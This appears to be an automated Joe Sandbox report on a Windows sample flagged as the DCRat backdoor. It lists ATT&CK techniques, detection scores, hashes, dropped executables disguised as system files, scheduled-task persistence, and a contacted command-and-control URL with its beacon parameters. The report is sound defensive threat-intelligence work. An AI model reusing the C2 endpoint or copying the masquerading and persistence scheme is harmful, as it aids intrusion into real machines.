Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	11 Scripting	Logon Script (Mac)	Logon Script (Mac)	11 Process Injection	NTDS	21 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	11 Scripting	Cached Domain Credentials	1 Remote System Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	2 Obfuscated Files or Information	DCSync	2 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	2 Software Packing	Proc Filesystem	37 System Information Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 DLL Side-Loading	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
cDouNOFXle.exe	54%	Virustotal		Browse
cDouNOFXle.exe	40%	Metadefender		Browse
cDouNOFXle.exe	60%	ReversingLabs	ByteCode-MSIL.Backdoor.LightStone
cDouNOFXle.exe	100%	Avira	VBS/Runner.VPG
cDouNOFXle.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Recovery\ShellExperienceHost.exe	100%	Avira	HEUR/AGEN.1249330
C:\comproviderRuntimecommon\RuntimeBroker.exe	100%	Avira	HEUR/AGEN.1249330
C:\comproviderRuntimecommon\backgroundTaskHost.exe	100%	Avira	HEUR/AGEN.1249330
C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	100%	Avira	HEUR/AGEN.1249330
C:\Recovery\winlogon.exe	100%	Avira	HEUR/AGEN.1249330
C:\Recovery\explorer.exe	100%	Avira	HEUR/AGEN.1249330
C:\comproviderRuntimecommon\chainsavesref.exe	100%	Avira	HEUR/AGEN.1249330
C:\Recovery\conhost.exe	100%	Avira	HEUR/AGEN.1249330
C:\comproviderRuntimecommon\et1pu6VAlkUOY7GuC90A.vbe	100%	Avira	VBS/Runner.VPG
C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	100%	Avira	HEUR/AGEN.1249330
C:\Recovery\ShellExperienceHost.exe	100%	Joe Sandbox ML
C:\comproviderRuntimecommon\RuntimeBroker.exe	100%	Joe Sandbox ML
C:\comproviderRuntimecommon\backgroundTaskHost.exe	100%	Joe Sandbox ML
C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	100%	Joe Sandbox ML
C:\Recovery\winlogon.exe	100%	Joe Sandbox ML
C:\Recovery\explorer.exe	100%	Joe Sandbox ML
C:\comproviderRuntimecommon\chainsavesref.exe	100%	Joe Sandbox ML
C:\Recovery\conhost.exe	100%	Joe Sandbox ML
C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	100%	Joe Sandbox ML
C:\Recovery\ShellExperienceHost.exe	55%	Virustotal		Browse
C:\Recovery\ShellExperienceHost.exe	70%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Recovery\conhost.exe	55%	Virustotal		Browse
C:\Recovery\conhost.exe	70%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Recovery\explorer.exe	55%	Virustotal		Browse
C:\Recovery\explorer.exe	70%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Recovery\winlogon.exe	55%	Virustotal		Browse
C:\Recovery\winlogon.exe	70%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	55%	Virustotal		Browse
C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	70%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	70%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\comproviderRuntimecommon\RuntimeBroker.exe	70%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\comproviderRuntimecommon\backgroundTaskHost.exe	70%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\comproviderRuntimecommon\chainsavesref.exe	70%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.3.cDouNOFXle.exe.5528b46.0.unpack	100%	Avira	VBS/Runner.VPG	Download File
0.3.cDouNOFXle.exe.5557b46.1.unpack	100%	Avira	VBS/Runner.VPG	Download File
6.0.chainsavesref.exe.350000.0.unpack	100%	Avira	HEUR/AGEN.1249330	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://index.from.sh/pages/game.html	0%	Virustotal		Browse
https://index.from.sh/pages/game.html	0%	Avira URL Cloud	safe
http://a0702220.xsph.ru8	0%	Avira URL Cloud	safe
http://a0702220.xsph.rux	0%	Avira URL Cloud	safe
http://go.mic	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
a0702220.xsph.ru	141.8.195.65	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://a0702220.xsph.ru/tolowprocessorGeneratortrack.php?rRmbiWWxEOd55k=WTgIsnKuV&e7d5ea1a013b440ebf41c5b405309b9e=b64e0d0fcd8b0e37eaa44643c1b6ab3c&94c8169d9b8cbbe19972e7f6bf4e65c1=AM5MjZxQmMhRjMzE2M5kTN2EWOwczYxYGN3UDM5YjZwM2YmRmN2EDO&rRmbiWWxEOd55k=WTgIsnKuV	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://cp.sprinthost.ru	MrsUvRPGeImAhc.exe, 00000017.00000002.362876471.0000000003106000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmp	false		high
https://index.from.sh/pages/game.html	MrsUvRPGeImAhc.exe, 00000017.00000002.362876471.0000000003106000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://a0702220.xsph.ru/tolowprocessorGeneratortrack.php?rRmbiWWxEOd55k=WTgIsnKuV&e7d5ea1a013b440ebf	MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.362535103.00000000030DB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://a0702220.xsph.ru8	MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://a0702220.xsph.rux	MrsUvRPGeImAhc.exe, 00000017.00000002.362800777.00000000030FC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	chainsavesref.exe, 00000006.00000002.296875095.00000000028F4000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.362535103.00000000030DB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://a0702220.xsph.ru	MrsUvRPGeImAhc.exe, 00000017.00000002.362876471.0000000003106000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.362535103.00000000030DB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://go.mic	MrsUvRPGeImAhc.exe, 00000010.00000002.325485482.0000000001020000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cp.sprinthost.ru/auth/login	MrsUvRPGeImAhc.exe, 00000017.00000002.362876471.0000000003106000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmp	false		high
http://a0702220.xsph.ru/	MrsUvRPGeImAhc.exe, 00000017.00000002.362379963.00000000030CB000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.361259028.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.363114487.0000000003130000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.362535103.00000000030DB000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
141.8.195.65	a0702220.xsph.ru	Russian Federation		35278	SPRINTHOSTRU	false

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	679544
Start date and time: 06/08/202200:51:06	2022-08-06 00:51:06 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	cDouNOFXle.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	42
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@34/22@1/1
EGA Information:	Successful, ratio: 16.7%
HDC Information:	Successful, ratio: 99.8% (good quality ratio 95%) Quality average: 78.7% Quality standard deviation: 28%
HCA Information:	Successful, ratio: 72% Number of executed functions: 425 Number of non-executed functions: 91
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, winlogon.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net, arc.msn.com
Execution Graph export aborted for target MrsUvRPGeImAhc.exe, PID 2756 because it is empty
Execution Graph export aborted for target MrsUvRPGeImAhc.exe, PID 3432 because it is empty
Execution Graph export aborted for target chainsavesref.exe, PID 3372 because it is empty
Execution Graph export aborted for target explorer.exe, PID 1820 because it is empty
Execution Graph export aborted for target explorer.exe, PID 5580 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:52:16	Task Scheduler	Run new task: conhost path: "C:\Recovery\conhost.exe"
00:52:16	Task Scheduler	Run new task: conhostc path: "C:\Recovery\conhost.exe"
00:52:17	Task Scheduler	Run new task: MrsUvRPGeImAhcM path: "C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe"
00:52:19	Task Scheduler	Run new task: MrsUvRPGeImAhc path: "C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe"
00:52:19	Task Scheduler	Run new task: winlogonw path: "C:\Recovery\winlogon.exe"
00:52:22	Task Scheduler	Run new task: explorer path: "C:\Recovery\explorer.exe"
00:52:22	Task Scheduler	Run new task: explorere path: "C:\Recovery\explorer.exe"
00:52:23	Task Scheduler	Run new task: winlogon path: "C:\Recovery\winlogon.exe"
00:52:25	Task Scheduler	Run new task: backgroundTaskHost path: "C:\comproviderRuntimecommon\backgroundTaskHost.exe"
00:52:26	Task Scheduler	Run new task: backgroundTaskHostb path: "C:\comproviderRuntimecommon\backgroundTaskHost.exe"
00:52:26	Task Scheduler	Run new task: RuntimeBroker path: "C:\comproviderRuntimecommon\RuntimeBroker.exe"
00:52:26	Task Scheduler	Run new task: RuntimeBrokerR path: "C:\comproviderRuntimecommon\RuntimeBroker.exe"
00:52:28	Task Scheduler	Run new task: ShellExperienceHost path: "C:\Recovery\ShellExperienceHost.exe"
00:52:28	Task Scheduler	Run new task: ShellExperienceHostS path: "C:\Recovery\ShellExperienceHost.exe"
00:52:49	API Interceptor	2x Sleep call for process: MrsUvRPGeImAhc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
141.8.195.65	0tLByFBV9D.exe	Get hash	malicious	Browse	a0669976.xsph.ru/b.exe
	659fc25606a80029012436848c7901b37fb1c580506fb.exe	Get hash	malicious	Browse	a0669976.xsph.ru/b.exe
	e79b96330e953aedb6d553bb9693644cb56bf1dffbbfc.exe	Get hash	malicious	Browse	a0669976.xsph.ru/b.exe
	LxJ8U1S74K.exe	Get hash	malicious	Browse	a0669976.xsph.ru/xx.exe
	injector.exe	Get hash	malicious	Browse	a0669976.xsph.ru/gm.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SPRINTHOSTRU	Proforma Invoice.js	Get hash	malicious	Browse	185.185.69.143
	etkZTYUCurtbuild.js	Get hash	malicious	Browse	185.185.69.143
	IVBPFW.exe	Get hash	malicious	Browse	141.8.192.151
	RSK8ECSJYV.exe	Get hash	malicious	Browse	141.8.192.163
	UMA88Hlam6.exe	Get hash	malicious	Browse	141.8.192.163
	BssRKxCgJw.exe	Get hash	malicious	Browse	141.8.192.82
	FortHack.exe	Get hash	malicious	Browse	141.8.192.163
	Fortnite Hack.exe	Get hash	malicious	Browse	141.8.192.163
	0tLByFBV9D.exe	Get hash	malicious	Browse	141.8.195.65
	659fc25606a80029012436848c7901b37fb1c580506fb.exe	Get hash	malicious	Browse	141.8.195.65
	e79b96330e953aedb6d553bb9693644cb56bf1dffbbfc.exe	Get hash	malicious	Browse	141.8.195.65
	Genshin Impact.exe	Get hash	malicious	Browse	141.8.195.65
	NOPL-25-JULY-001.doc	Get hash	malicious	Browse	141.8.192.151
	300618c6e81ee458a3aba4188f0f24937f62974991428.exe	Get hash	malicious	Browse	141.8.192.151
	2dOeahdsto.exe	Get hash	malicious	Browse	141.8.192.169
	LxJ8U1S74K.exe	Get hash	malicious	Browse	141.8.195.65
	7pTGtFltMI.exe	Get hash	malicious	Browse	141.8.192.82
	https://drive.google.com/file/d/1nqpk7RY2QNDanRjehWlT7FCVTr0VWDO4/view?usp=sharing	Get hash	malicious	Browse	141.8.192.26
	H29Sj5e4FT.exe	Get hash	malicious	Browse	141.8.192.151
	axnCDWrZKu.exe	Get hash	malicious	Browse	141.8.192.151

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Recovery\088424020bedd6

Download File

Process:	C:\comproviderRuntimecommon\chainsavesref.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	837
Entropy (8bit):	5.919202933432686
Encrypted:	false
SSDEEP:	12:InWMz/5YD5Cb8IvQXw9h7ZEIkpV+JgMOoEUQzyzTDESudWokCXd4zDCLHigCkrnq:IWTD5XEQaBwiJgMvCzWISKW2d4fgBw
MD5:	A836B53C99726EFC79C466816D8D28B5
SHA1:	31F73DA56CA51D71512CB8DD7305FACE255EF802
SHA-256:	B851B82C5C0EADFE0A718DE04E0D01FB5BE7A536238724BC717987A2BFA873FA
SHA-512:	055D417449537442EDD3F1014317B96B8D822B85C116E72A613E4A0074A32720C7D03CC5F3BEB2E8E627E4270D65DE7311AB4565D6B9D4749074309F7CB68398
Malicious:	false
Preview:	db4Tf5aQP7wTzMG4d7rMVo97dj9BkQw8FYVnXFs1cTXdecdEQfQqgIeyc6z66Yq8LxOa1dgXPzuBRgcBG4vEAFb74gLaQw5DmZSqOCMx83brYch5ex0Bnl8FWQgVSGGc4qZ1OvxDs8FGoujb8P5c63ZAaNU7g1e2w8wrDprsAwTpg1alrFWCKogARYbAbzh0dNUq71YShNcJkueiwsPbfbrIbvapOqQKPdMShtn0rDf7MXag32NskGVBgMPLbsE06R3GhMBDEZub6u5DV3vVdikJILvUecY89oA4eT9r0KnLW3EwQL0h6sXYrt8WaqjmAvbRtBjB4EeS4YxOG9ESl0BRRmNuUmQKlAKkcwCPmyn2NFdS6uQamQBJuKAHyyrRxUq3NMwT6zpxNIDLI4xkWziV9BzRv5bxHVE3YkEt76ewkN6lGy93BG57wV3MXeiBY2p1EKxhzEmZVvuwFOK66hwAZGGCq2WcYdYshEh6BbE7dgmAlHHJUlE0Fpb8Dv16rJB2XCOArO5fdzh3eGbivNIxYhm2mi2PjHPTetmj3GcFpjXPHie7USLeAOe0ZVYIWq5WkNZud2ppvDIyJXuEE55R6vSQPwJhsTt8oBp4Itdcnfs7FpqCkTDavoZy4IfrsH7bTJKIr05VccnaCVKkFH7YQSNAl0AAOvtfiRn6eiUuYs8SA9wj84mkKjLA5Kg105GqtI2vrNFhxM9iU59mEaBTJJV9GnBUBc4dlRj2HA2uzFx8jmq9K4wZ3whjw2pEMufURg6CWHfEiReEWXad6BKHqfkyu9FOVyhEjcqCqonCZs0lScNZcLHLkYow6HRXCQsut

C:\Recovery\7a0fd90576e088

Download File

Process:	C:\comproviderRuntimecommon\chainsavesref.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	814
Entropy (8bit):	5.896066697042415
Encrypted:	false
SSDEEP:	24:GDDqFMMEx3Qvm9wy2wUhpqQeGHOqGUQ3xS12:iOKMExA+REpugOoQ3cI
MD5:	B4B5C242A0BBC225FA07D76D8AF6D4ED
SHA1:	35707D7467D96BA0F392A69CB64BE4F4FC77766D
SHA-256:	96E0DED81CF69A8BF874E6C66A14B708451EA5F7FDB0433C7F06747C7B09F48E
SHA-512:	57BC8AAB4036D47A770E261D4AA83FCDD57B5A310B3ADBE16760E0734236F77B7A06FB047AD055025DFEEFC39FB2355A1684DE01542670DE44009AF5034CF284
Malicious:	false
Preview:	GzQyEW5IoDZJJ1kEvOd1cuoaeuDD01MX5wsm4UPM3SbFa2Glx7EXt6VVLzUTS2Sw1COXI7Ja9R8JSjAmncP2xyn9aWbEA53BApNXntc0yoYc7LDlzrq0mZ9CZO6vfEZDY7JnWm849ZEIaKBPT0PTPCYkpL8YxqVtOVEABZPMtw0NV0lONrbpzGyVij7KnjGTEU4FGBN3kCjdMLPzjuLGOp4HgsbcbEjJphIA5gHLdiEwgUIWTIl3XAEYaxiXjubgdaxpCP3Cm9mqlHkLkEJTcqvodujI7umtGiTGhcUEPjQYYXwTNWxflIDwoIMSpvE2X2kDydoHuED3ZXQF7Q4l6GI7egbYQBYeeYAfwtftrpugEKXR2GUZ0d5QunjRCQ0spjYBXuTOvL3QWm2UJKfKq9oBctvIKNrbzB0fvW3IwGnojo4HuOI1uqBq5Xio8KDhebbUvWiwQXXkW9bxynY5FzrI9KkXxPJmDFKIMkWXpVlWTbU66uzUwIcptTUlwL8AOvgQyTkORAPtNVyi0obDayz4mfY3QuleXkIi5DHnJlDw2tbYfwvIu5kZ5lnT4r7gYuWnNPnwgx3yvDC3DAYd9cub9snTaxscngXHXxLPJ9l6Bwo2juP4Teh6A4oemTVtEbKOp4fQyIUA0yaNEutphyIJ9bHdJrmzn21jlZNpP9FKJgGMeaZ1kpMQTBOOwCGHffW860lphDahs79dU59sRvO7pkQjL83M28ooKHPnyuThPohVCv30CYzuQZSWjCdjKNpuSUTNqV3hbrsBD5haFCKeI4Yuz3EwQuWB9wCrcqKreS

C:\Recovery\ShellExperienceHost.exe

Download File

Process:	C:\comproviderRuntimecommon\chainsavesref.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	848384
Entropy (8bit):	6.083714696898079
Encrypted:	false
SSDEEP:	12288:584s165YnPKDGWcvOarVwvZDyg7VGNtImleJ:C1IDGWcmarVKFPJ
MD5:	4EAF964B744BD6801B5122AE1AFBBDE4
SHA1:	6E459FB6F3C6B7094D8D5AF10BC30C87AEE03981
SHA-256:	B570E2028088759D02EA13F7646BF7ACA78865D55F7FD8E2EFAEEC45C670E9FF
SHA-512:	DC3E15AB58996C71E8999DD5521961F2BD08529F685465BCA5B11319EF0B4DC009F2528097ADCE0DCA44FC675BA04156F9846F986F07A3E8CED366D5ABBD2D4A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 55%, Browse Antivirus: ReversingLabs, Detection: 70%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......~.... ........@.. .......................`............@.................................0...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Recovery\cc11b995f2a76d

Download File

Process:	C:\comproviderRuntimecommon\chainsavesref.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	374
Entropy (8bit):	5.822060650367992
Encrypted:	false
SSDEEP:	6:O1YN7wg2PXOBG2z2WnfV/nH5NjgwJxXZIBVEynMto7KeRQ10iBDsBZGMWbn:O1YnmXOTVnH3k0xpIBVznMto7ZQ10cU0
MD5:	BB5E9B0632879AE9B7B6F1D9FC353445
SHA1:	B8B8DFF17AAFECD248153D958F41B00A09196238
SHA-256:	3D14ABD2AE8018470375EF9F0D6515D9CDB83E1DA6B828693CDF1DB839EFCD1A
SHA-512:	88B1AE97928387DA365C84D7C07FEACB982DDE4D2B209448CC53E55F0BFB264D580DE69955DEE4BD12DFBDFDF03F8CE227492518ED0E49C3684C9CF93563F69D
Malicious:	false
Preview:	xJDOqRskYofURDFwUsu9cGEux27KB1zIgtLFNy29Pj0RzImfyW448c4qESaxUijgyWxh29igzvt2Qx5pQcVo75KEzeA5XForATdcUEnyxYENsBaRWvh2M4j2MssX8mIuGC26TcULzh1i16WxEtimhwfFulQmWPzLPUHpId74aWDpDABQW4TPDgMThwMsMsyjrpThyqpkvoLLt0CtkAPc5kHsHyIWRPrshd7XrebqPtdZVBjrudIMcWoGikZAhTTg6coQ2oBFijNLHsXGPblxHfQKy1zGEaI6a7c2XSyFbCn2Jc8zNTvFrfYaMdcBz5BHbQvKPes6ngVF2XBV293upCO5iCq40xQgAfb2ryktlycKJTiybGIzCQ

C:\Recovery\conhost.exe

Download File

Process:	C:\comproviderRuntimecommon\chainsavesref.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	848384
Entropy (8bit):	6.083714696898079
Encrypted:	false
SSDEEP:	12288:584s165YnPKDGWcvOarVwvZDyg7VGNtImleJ:C1IDGWcmarVKFPJ
MD5:	4EAF964B744BD6801B5122AE1AFBBDE4
SHA1:	6E459FB6F3C6B7094D8D5AF10BC30C87AEE03981
SHA-256:	B570E2028088759D02EA13F7646BF7ACA78865D55F7FD8E2EFAEEC45C670E9FF
SHA-512:	DC3E15AB58996C71E8999DD5521961F2BD08529F685465BCA5B11319EF0B4DC009F2528097ADCE0DCA44FC675BA04156F9846F986F07A3E8CED366D5ABBD2D4A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 55%, Browse Antivirus: ReversingLabs, Detection: 70%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......~.... ........@.. .......................`............@.................................0...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Recovery\explorer.exe

Download File

Process:	C:\comproviderRuntimecommon\chainsavesref.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	848384
Entropy (8bit):	6.083714696898079
Encrypted:	false
SSDEEP:	12288:584s165YnPKDGWcvOarVwvZDyg7VGNtImleJ:C1IDGWcmarVKFPJ
MD5:	4EAF964B744BD6801B5122AE1AFBBDE4
SHA1:	6E459FB6F3C6B7094D8D5AF10BC30C87AEE03981
SHA-256:	B570E2028088759D02EA13F7646BF7ACA78865D55F7FD8E2EFAEEC45C670E9FF
SHA-512:	DC3E15AB58996C71E8999DD5521961F2BD08529F685465BCA5B11319EF0B4DC009F2528097ADCE0DCA44FC675BA04156F9846F986F07A3E8CED366D5ABBD2D4A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 55%, Browse Antivirus: ReversingLabs, Detection: 70%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......~.... ........@.. .......................`............@.................................0...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Recovery\f8c8f1285d826b

Download File

Process:	C:\comproviderRuntimecommon\chainsavesref.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	318
Entropy (8bit):	5.821678878981174
Encrypted:	false
SSDEEP:	6:cgA2F14JMlZwZdQGlGc9Pw5QwLicI+HCVr8VsPJWjCm5EwGoThjzYsiZLix:cgA2F14JMDGluxIX6uPY+rwGeUjZLM
MD5:	E1D19D6C3F4BB41CB9125A86FB1E2583
SHA1:	342577F1EEB903AE174478BEBBD2B307548CE64D
SHA-256:	69806E929465780686EBF6EEC2D32D69BA2A0F19B5E89877E52CA15B6B035037
SHA-512:	56E494BF9D702A0287F1DBA7AF288AF3359C13A4D85AC08C28D5E59C60845B94FDF0B4444515DC64D5DB8A6F754D2B488A6727DE0A1F18BCD4313309EC344017
Malicious:	false
Preview:	MAzYOEH2EeSX6dTFsT7pwOX2898kwmkJuHIgBB1e7v2xZ7AlHJWVgxh7n6ZOFhFc3ImyVxDrccsAWjcA9XcmQPn7jK3FlmZapa3RULQTGo2DEglDdYPsEcLofpPK48F0DRV6pLqxGJglXj2Dj0lNWqVNOPvp6FZIjBAwLoXRscl46kR5wLkEW2dW5IsaZA0AtYCVjF24cTe4FbRn703vfVvrhn1C662rmkLhi6VqSplCXjRe1EdjHEfYmUx6Oz8gbxRePtFBeMczttU8WWL1dSkhFw5NIZbdrFkkRwOH9cE4lqo3Azk2nGCJMuZdx1

C:\Recovery\winlogon.exe

Download File

Process:	C:\comproviderRuntimecommon\chainsavesref.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	848384
Entropy (8bit):	6.083714696898079
Encrypted:	false
SSDEEP:	12288:584s165YnPKDGWcvOarVwvZDyg7VGNtImleJ:C1IDGWcmarVKFPJ
MD5:	4EAF964B744BD6801B5122AE1AFBBDE4
SHA1:	6E459FB6F3C6B7094D8D5AF10BC30C87AEE03981
SHA-256:	B570E2028088759D02EA13F7646BF7ACA78865D55F7FD8E2EFAEEC45C670E9FF
SHA-512:	DC3E15AB58996C71E8999DD5521961F2BD08529F685465BCA5B11319EF0B4DC009F2528097ADCE0DCA44FC675BA04156F9846F986F07A3E8CED366D5ABBD2D4A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 55%, Browse Antivirus: ReversingLabs, Detection: 70%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......~.... ........@.. .......................`............@.................................0...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MrsUvRPGeImAhc.exe.log

Download File

Process:	C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.367899416177239
Encrypted:	false
